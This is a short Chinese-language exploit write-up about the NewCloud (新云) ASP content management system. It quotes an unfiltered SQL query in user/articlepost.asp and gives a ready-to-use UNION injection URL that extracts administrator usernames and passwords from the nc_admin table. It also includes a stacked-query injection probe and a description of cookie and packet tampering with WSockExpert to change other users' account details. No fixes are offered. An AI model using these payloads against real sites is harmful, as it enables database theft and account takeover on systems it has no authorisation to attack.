关于新云
新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。
漏洞原理
利用各种方法实现入侵,如COOKIES、抓包、注入检测等。
1.过滤未全
user\articlepost.asp 文件第333行
Quote SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom, WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And username=’" & Newasp.MemberName & "’ And ArticleID=" & Request("ArticleID")
没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select% 201,2,3,4,5,username,password,8,9%20from%20nc_admin
注册后直接在浏览器上输入,就可以爆出管理员的表和代码。
2.新云2.1SQL版注入漏洞
漏洞描述:
动画频道的“动画管理”和“审核管理”,错误类型:
Quote Microsoft OLE DB Provider for SQL Server (0x80040E14) 未能找到存储过程 ’NC_FlashAdminList’。 /admin/admin_Flash.asp, 第 233 行
可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:
articlepost.asp?ChannelID=1&action=view&ArticleID=1;--
3.COOKIES欺骗获取管理账号
攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。